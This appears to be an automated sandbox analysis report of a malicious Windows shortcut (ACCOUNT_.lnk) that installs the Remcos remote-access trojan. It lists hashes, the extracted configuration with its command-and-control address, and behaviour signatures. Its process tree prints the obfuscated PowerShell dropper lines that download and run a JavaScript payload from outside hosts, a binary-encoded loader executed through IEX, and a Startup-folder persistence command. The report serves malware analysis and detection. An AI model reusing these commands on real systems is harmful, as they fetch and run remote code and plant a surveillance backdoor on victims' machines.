Analysis

  • max time kernel
    150s
  • max time network
    153s
  • platform
    windows7_x64
  • resource
    win7-20220812-en
  • resource tags

    arch:x64, arch:x86, image:win7-20220812-en, locale:en-us, os:windows7-x64, system
  • submitted
    29-09-2022 19:42

General

  • Target

    ACCOUNT_.lnk

  • Size

    2KB

  • MD5

    3e522f13adc386d31e7cde4a557d53ff

  • SHA1

    8f1662bf897b374595b536357333c04490dcea11

  • SHA256

    58b93a208ac83f3ce577233f924ff0f10662fedc589a5c2b46733e7fd5a41b5e

  • SHA512

    05771b5443bba696e85534b45e1972268e14461fc7320a21353a0a45f3e67921c5184d8bc15889a839c8f9a8278010b34f1a76289ff3383c70fa289955dd4bfb

Score
10/10

Malware Config

Extracted

Family

remcos

Botnet

Septa

C2

topboysully.dvrlists.com:10171

Attributes
  • audio_folder

    MicRecords

  • audio_path

    %AppData%

  • audio_record_time

    5

  • connect_delay

    0

  • connect_interval

    1

  • copy_file

    remcos.exe

  • copy_folder

    Remcos

  • delete_file

    false

  • hide_file

    false

  • hide_keylog_file

    false

  • install_flag

    false

  • install_path

    %AppData%

  • keylog_crypt

    false

  • keylog_file

    logs.dat

  • keylog_flag

    false

  • keylog_folder

    remcos

  • keylog_path

    %AppData%

  • mouse_option

    false

  • mutex

    Septa-C812S4

  • screenshot_crypt

    false

  • screenshot_flag

    false

  • screenshot_folder

    Screenshots

  • screenshot_path

    %AppData%

  • screenshot_time

    10

  • startup_value

    Remcos

  • take_screenshot_option

    false

  • take_screenshot_time

    5

Signatures

  • Remcos

    Remcos is closed-source remote control and surveillance software.

  • Blocklisted process makes network request 4 IoCs
  • Deletes itself 1 IoCs
  • Loads dropped DLL 1 IoCs
  • Suspicious use of SetThreadContext 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Modifies Internet Explorer settings 1 TTPs 35 IoCs
  • Suspicious behavior: EnumeratesProcesses 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 23 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of SetWindowsHookEx 5 IoCs
  • Suspicious use of WriteProcessMemory 35 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    cmd /c C:\Users\Admin\AppData\Local\Temp\ACCOUNT_.lnk
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1688
    • C:\windows\system32\cmd.exe
      "C:\windows\system32\cmd.exe" /c powers""hell/W 01 $op=''+'I'+''+'e'+'X';sal donke $op;$lgo=donke($('[En""viro""nment]::G""etEfc4s'''.Re""place('fc4','nvironment""Va""riable(''pu""blic'') + ''\\bu4b.j')));fun""ction sick""o([string]$fz, [string]$oulv){$ff=donke($('(Ntzt5""w-O""bjtzt5ct Sys""ttzt5m.""Ntzt5t.""Wtzt5bC""litzt5nt).D""ownfnvre($oul""v.Rep""lace(''ynx1'',''tp""s:/""/'').Rep""lac""e(''iyk'', ''e''), $fz)').R""epl""ace('tzt5', 'e').R""epla""ce('fnvr', 'lo""adF""il'));donke('sg6eaiarg6eai $fz'.Replace('g6eai','t'))};$fzf=$(Get-Location).tostring() + '\\';Remove-Item -Path ($fzf + $(Get-ChildItem -Include *.lnk -Name));sick""o -fz ($fzf + 'Exams 2022.txt') -oulv 'htynx1transfiykr.sh/DdXp7y/tiykst.txt';sick""o -fz $lgo -oulv 'http://209.127.20.13/wokiyk.js';exit
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1316
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        powers""hell /W 01 $op=''+'I'+''+'e'+'X';sal donke $op;$lgo=donke($('[En""viro""nment]::G""etEfc4s'''.Re""place('fc4','nvironment""Va""riable(''pu""blic'') + ''\\bu4b.j')));fun""ction sick""o([string]$fz, [string]$oulv){$ff=donke($('(Ntzt5""w-O""bjtzt5ct Sys""ttzt5m.""Ntzt5t.""Wtzt5bC""litzt5nt).D""ownfnvre($oul""v.Rep""lace(''ynx1'',''tp""s:/""/'').Rep""lac""e(''iyk'', ''e''), $fz)').R""epl""ace('tzt5', 'e').R""epla""ce('fnvr', 'lo""adF""il'));donke('sg6eaiarg6eai $fz'.Replace('g6eai','t'))};$fzf=$(Get-Location).tostring() + '\\';Remove-Item -Path ($fzf + $(Get-ChildItem -Include *.lnk -Name));sick""o -fz ($fzf + 'Exams 2022.txt') -oulv 'htynx1transfiykr.sh/DdXp7y/tiykst.txt';sick""o -fz $lgo -oulv 'http://209.127.20.13/wokiyk.js';exit
        3⤵
        • Blocklisted process makes network request
        • Deletes itself
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:1300
        • C:\Windows\System32\WScript.exe
          "C:\Windows\System32\WScript.exe" "C:\Users\Public\bu4b.js"
          4⤵
          • Suspicious use of WriteProcessMemory
          PID:1584
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" function ermkflll { $gf=('55155155,51555151,51115515,51115515,51151111,51115515,51555551,51155511,51115155,51151551,51151111,51151115,51515555,51115515,51155151,51155115,51155151,51115515,51155151,51151115,51155511,51155151,55155555,55111151,55155555,55155111,51515511,51151551,51151155,51155151,51151115,51115155,51151155,51111551,51555511,51151111,51151115,51115155,51151551,51151115,51115151,51155151,55155111,55111511,55155155,51115155,55115151,55115115,51155115,51155111,55155555,55111151,55155555,51511511,51555151,51151115,51115151,51151151,51511151,55111515,55111515,51515155,51151111,51551111,51155515,51151515,51155151,51155511,51115155,55151555,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,51515155,51111551,51115555,51155151,51511151,55151155,55155555,55115511,55115555,55115111,55115515,55151551,55111511,51511511,51515511,51111551,51115511,51115155,51155151,51151151,55151115,51551115,51155151,51115155,55151115,51515511,51155151,51115515,51115115,51151551,51155511,51155151,51515555,51151111,51151551,51151115,51115155,51551151,51155551,51151115,51155551,51155111,51155151,51115515,51511151,55111515,55111515,51515511,51155151,51155511,51115151,51115515,51151551,51115155,51111551,51515555,51115515,51151111,51115155,51151111,51155511,51151111,51151155,55155555,55111151,55155555,55155155,51115155,55115151,55115115,51155115,51155111,55111511,51555551,51155155,51155155,55151151,51515155,51111551,51115555,51155151,55155555,55151151,51555551,51115511,51115511,51155151,51151151,51155515,51151155,51111551,51551115,51155551,51151151,51155151,55155555,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55111511,51155155,51151111,55155555,51111511,55155155,51115555,51151551,51151115,51155111,55155555,55111151,55155555,51115155,51155151,51115511,51115155,55151151,51155511,51151111,51151115,51151115,51155151,51155511,51115155,51151551,51151111,51151115,55155555,55151151,51155511,51151111,51151151,51115555,55155555,51155111,51151111,51151111,51155111,51151155,51155151,55151115,51155511,51151111,51151151,55155555,55151151,51155511,51151111,51115151,51151115,51115155,55155555,55115551,55155555,55151151,51515551,51115151,51151551,51155151,51115155,51111151,55155555,51115151,51151115,51115155,51151551,51151155,55155555,55151555,55155155,51115555,51151551,51151115,51155111,55151551,55111511,55155155,51115155,51115155,51111551,55111151,51515555,55151555,55155111,55151555,51551115,51155151,51115111,55151151,55155111,55151511,55155111,51551111,51155515,51151515,51155151,55155111,55151511,55155111,51155511,51115155,55155555,51551115,51155151,55155111,55151511,55155111,51115155,55151115,51515111,51155151,55155111,55151511,55155111,51155515,51555511,51151155,51151551,55155111,55151511,55155111,51155151,51151115,51115155,55151551,55155111,55151551,55111511,55155155,51151151,51115115,55111151,55155555,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51551551,51151115,51115155,51155151,51115515,51155551,51155511,51115155,51151551,51151111,51151115,51511151,55111515,55111515,51555511,51155551,51151155,51151155,51555515,51111551,51151115,51155551,51151151,51155151,55151555,55155155,51115155,51115155,51111551,55151155,55155111,51555155,51151111,51115111,51151115,55155111,55155555,55151511,55155555,55155111,51151155,51151111,51155551,51155155,55155111,55155555,55151511,55155555,55155111,51515511,51115155,51115515,55155111,55155555,55151511,55155555,55155111,51151551,51151115,51155111,55155111,55151155,51511511,51551151,51151551,51155511,51115515,51151111,51115511,51151111,51155115,51115155,55151115,51515115,51151551,51115511,51115151,51155551,51151155,51555515,51155551,51115511,51151551,51155511,55151115,51555511,51155551,51151155,51151155,51515155,51111551,51115555,51155151,51511151,55111515,55111515,51551151,51155151,51115155,51151555,51151111,51155155,55151155,55155111,51151555,51115155,51115155,51115555,55155111,55155555,55151511,55155555,55155111,55111515,55151111,55151111,55115515,55115555,55111551,55151115,55115551,55115515,55115111,55151115,55115515,55115555,55151115,55115551,55115511,55151111,51155111,51151111,51155551,55151115,51151515,51115555,51155111,55155111,55151551,51111155,51515555'.replace('5','0')|IEX) | %{ [System.Text.Encoding]::UTF8.GetString([System.Convert]::ToInt32($_,2)) } $o00=[char]105 + 'EX';sal P $o00;([system.String]::Join('', $gf))|P } ermkflll
            5⤵
            • Blocklisted process makes network request
            • Loads dropped DLL
            • Suspicious use of SetThreadContext
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of WriteProcessMemory
            PID:2040
            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
              6⤵
              • Suspicious use of SetWindowsHookEx
              PID:1348
          • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
            "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Move-Item 'C:\Users\Public\bu4b.js' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\'
            5⤵
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of AdjustPrivilegeToken
            PID:1052
  • C:\Program Files\Internet Explorer\iexplore.exe
    "C:\Program Files\Internet Explorer\iexplore.exe" -Embedding
    1⤵
    • Modifies Internet Explorer settings
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:1088
    • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
      "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1088 CREDAT:275457 /prefetch:2
      2⤵
      • Modifies Internet Explorer settings
      • Suspicious use of SetWindowsHookEx
      PID:1772

Network

MITRE ATT&CK Enterprise v6

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\Internet Explorer\imagestore\tcz8fqz\imagestore.dat

    Filesize

    34KB

    MD5

    48a0cc1162c1399e55e8d5aaa4ec50a8

    SHA1

    a8426b6640d321a3f0bbce30b58c97584a08a0e0

    SHA256

    a46196d8f0f0c26c91cd6d9ad4e124d3f99a78d3c7f4a2f2084770fbae0bcd32

    SHA512

    7164fa1bf64dc0b5a70c1d9cbf02ac8cf2dc97df6cdc545c9a6b07063c506fc2952ba920df37aac247e656b30cd89cc6bedb10ba70ba1042e048adc70306d889

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\FC5D3SKE.txt

    Filesize

    608B

    MD5

    42f78e06d333b7fd485fa29b51d327e3

    SHA1

    e55590c35670b569878042a3a718697df2a7a506

    SHA256

    c957a39d0fcabc6517d09ab8d84004d9dec38ad35c22d8f7621c41f7c576e0ca

    SHA512

    4bd46a42259a0555cc1de4114f09bc2106da36f716d8ba137f63428dd3d8d292262abc7935a88f5ac7efba3aa6bcdb2001bc2791dfa49e74510d27617339b428

  • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms

    Filesize

    7KB

    MD5

    1ea8e68a1077e6956b9e11be01b4e2d4

    SHA1

    e39fb86056cd4786adac8e0744233960fbc83060

    SHA256

    2a4ff0919323d03a4e4aa237ffe698ebd13fc582c5ba610e64e0bfcf5cc3bc0f

    SHA512

    c37e825b30150bade81b7d5158e64e3325c6a01b3b8da8b89d6d69e7516796ef0cb3255f07a66e9e3f536b060b46d0de4f5f82d75e293bb0bebae3effd012056

  • C:\Users\Public\bu4b.js

    Filesize

    1KB

    MD5

    ddbddd6eeba7f34b9ea034e7cb677d56

    SHA1

    5219a2217f67d0777d8846669f05faf063b58174

    SHA256

    37a6b17e9660a3db4693282a0b132bc6966fc8d48898f07715cf20aaaa244c2f

    SHA512

    41ea97d1bcefc207faa536bbbe56d14b54989bdcb43d71b76167803921f26e5e9d5909697b84e2df606f454e7f87c5398dc7f01899fe26494cc4a0916b06380f

  • \Users\Admin\AppData\Local\Temp\73ab9a28-0688-49e7-b77d-eacdd07237df\AgileDotNetRT64.dll

    Filesize

    75KB

    MD5

    42b2c266e49a3acd346b91e3b0e638c0

    SHA1

    2bc52134f03fcc51cb4e0f6c7cf70646b4df7dd1

    SHA256

    adeed015f06efa363d504a18acb671b1db4b20b23664a55c9bc28aef3283ca29

    SHA512

    770822fd681a1d98afe03f6fbe5f116321b54c8e2989fb07491811fd29fca5b666f1adf4c6900823af1271e342cacc9293e9db307c4eef852d1a253b00347a81

  • memory/1052-119-0x000000000265B000-0x000000000267A000-memory.dmp

    Filesize

    124KB

  • memory/1052-118-0x0000000002654000-0x0000000002657000-memory.dmp

    Filesize

    12KB

  • memory/1052-113-0x000007FEF3BE0000-0x000007FEF4603000-memory.dmp

    Filesize

    10.1MB

  • memory/1052-120-0x0000000002654000-0x0000000002657000-memory.dmp

    Filesize

    12KB

  • memory/1052-106-0x0000000000000000-mapping.dmp

  • memory/1052-114-0x000007FEF3080000-0x000007FEF3BDD000-memory.dmp

    Filesize

    11.4MB

  • memory/1052-122-0x000000000265B000-0x000000000267A000-memory.dmp

    Filesize

    124KB

  • memory/1052-116-0x000000001B7F0000-0x000000001BAEF000-memory.dmp

    Filesize

    3.0MB

  • memory/1300-96-0x0000000002374000-0x0000000002377000-memory.dmp

    Filesize

    12KB

  • memory/1300-101-0x000000000237B000-0x000000000239A000-memory.dmp

    Filesize

    124KB

  • memory/1300-100-0x0000000002374000-0x0000000002377000-memory.dmp

    Filesize

    12KB

  • memory/1300-97-0x000000000237B000-0x000000000239A000-memory.dmp

    Filesize

    124KB

  • memory/1300-95-0x000007FEF30F0000-0x000007FEF3C4D000-memory.dmp

    Filesize

    11.4MB

  • memory/1300-94-0x000007FEF3C50000-0x000007FEF4673000-memory.dmp

    Filesize

    10.1MB

  • memory/1300-90-0x0000000000000000-mapping.dmp

  • memory/1316-88-0x0000000000000000-mapping.dmp

  • memory/1348-131-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1348-138-0x00000000004327A4-mapping.dmp

  • memory/1348-146-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1348-145-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1348-143-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1348-142-0x0000000075601000-0x0000000075603000-memory.dmp

    Filesize

    8KB

  • memory/1348-137-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1348-133-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1348-135-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1348-125-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1348-126-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1348-128-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1348-130-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1348-132-0x0000000000400000-0x000000000047F000-memory.dmp

    Filesize

    508KB

  • memory/1584-102-0x0000000001C30000-0x0000000001C40000-memory.dmp

    Filesize

    64KB

  • memory/1584-98-0x0000000000000000-mapping.dmp

  • memory/1688-54-0x000007FEFB6A1000-0x000007FEFB6A3000-memory.dmp

    Filesize

    8KB

  • memory/2040-124-0x000007FEF26E0000-0x000007FEF2864000-memory.dmp

    Filesize

    1.5MB

  • memory/2040-115-0x000000001B6E0000-0x000000001B9DF000-memory.dmp

    Filesize

    3.0MB

  • memory/2040-104-0x0000000000000000-mapping.dmp

  • memory/2040-140-0x0000000002734000-0x0000000002737000-memory.dmp

    Filesize

    12KB

  • memory/2040-110-0x000007FEF3BE0000-0x000007FEF4603000-memory.dmp

    Filesize

    10.1MB

  • memory/2040-141-0x000000000273B000-0x000000000275A000-memory.dmp

    Filesize

    124KB

  • memory/2040-121-0x000000000273B000-0x000000000275A000-memory.dmp

    Filesize

    124KB

  • memory/2040-112-0x000007FEF3080000-0x000007FEF3BDD000-memory.dmp

    Filesize

    11.4MB

  • memory/2040-117-0x0000000002734000-0x0000000002737000-memory.dmp

    Filesize

    12KB